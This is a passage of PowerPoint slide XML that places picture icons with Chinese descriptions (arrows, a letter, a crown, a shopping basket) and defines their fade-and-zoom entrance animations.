          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId24">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId25"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3604260" y="3141980"/>
            <a:ext cx="495935" cy="495935"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="图片 18" descr="循环箭头"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId26">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId27"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="523875" y="2791460"/>
            <a:ext cx="523875" cy="523875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="图片 21" descr="信"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId28">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId29"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="2324100"/>
            <a:ext cx="467360" cy="467360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="图片 22" descr="声音"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId30">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId31"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="2476500"/>
            <a:ext cx="467360" cy="467360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="图片 23" descr="上学"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId32">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId33"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="2324100"/>
            <a:ext cx="574040" cy="574040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="图片 24" descr="上学"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId34">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId35"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3604260" y="2545080"/>
            <a:ext cx="527685" cy="527685"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="图片 25" descr="上课"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId36">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId37"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4054475" y="1998980"/>
            <a:ext cx="476885" cy="476885"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="图片 26" descr="皇冠"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId38">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId39"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1047750" y="3238500"/>
            <a:ext cx="523875" cy="523875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="图片 27" descr="纸笔"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId40">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId41"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="1040130"/>
            <a:ext cx="568325" cy="568325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="图片 28" descr="购物篮"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId42">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId43"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3317240" y="1901190"/>
            <a:ext cx="574675" cy="574675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>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1" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="10000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_x+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_h+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_w+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500" tmFilter="0,0; .5, 1; 1, 1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="18" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2049"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="19" presetID="26" presetClass="emph" presetSubtype="0" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="22" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2549"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="23" presetID="41" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="10000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_x+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_h+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_w+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="500" tmFilter="0,0; .5, 1; 1, 1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="30" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3299"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="31" presetID="26" presetClass="emph" presetSubtype="0" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="34" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3799"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="35" presetID="16" presetClass="entr" presetSubtype="21" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="20"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="barn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="38" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="4299"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="39" presetID="41" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="10000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_x+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_h+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_w+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="500" tmFilter="0,0; .5, 1; 1, 1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="46" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="5050"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="47" presetID="26" presetClass="emph" presetSubtype="0" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="48" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="49" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="50" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="5550"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="51" presetID="41" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="10000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="53" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_x+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="54" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="55" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_h+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
